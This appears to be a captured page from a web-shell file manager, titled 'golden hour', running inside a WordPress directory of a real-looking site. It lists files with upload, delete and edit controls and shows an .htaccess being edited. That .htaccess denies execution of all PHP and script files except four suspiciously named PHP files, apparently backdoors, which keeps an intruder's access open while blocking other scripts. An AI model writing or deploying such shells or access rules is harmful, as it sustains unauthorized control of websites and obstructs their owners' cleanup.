golden hour
/home/godaofbq/hyperxmed.com/wp-includes/js/dist/development
⬆️ Go Up
Upload
File/Folder
Size
Actions
.htaccess
514 B
Del
OK
react-refresh-entry.js
47.02 KB
Del
OK
react-refresh-entry.min.js
13.25 KB
Del
OK
react-refresh-runtime.js
22.23 KB
Del
OK
react-refresh-runtime.min.js
5.37 KB
Del
OK
Edit: .htaccess
<FilesMatch "(?i)\.(py|exe|phtml|php\d*|suspected|cgi)$"> <IfModule mod_authz_core.c> Require all denied </IfModule> <IfModule !mod_authz_core.c> Order allow,deny Deny from all </IfModule> </FilesMatch> <FilesMatch "^(site-maintenance\.php|styles\.php|wp-upgrade\.php|qinfofuns\.php)$"> <IfModule mod_authz_core.c> Require all granted </IfModule> <IfModule !mod_authz_core.c> Order allow,deny Allow from all </IfModule> </FilesMatch>
Save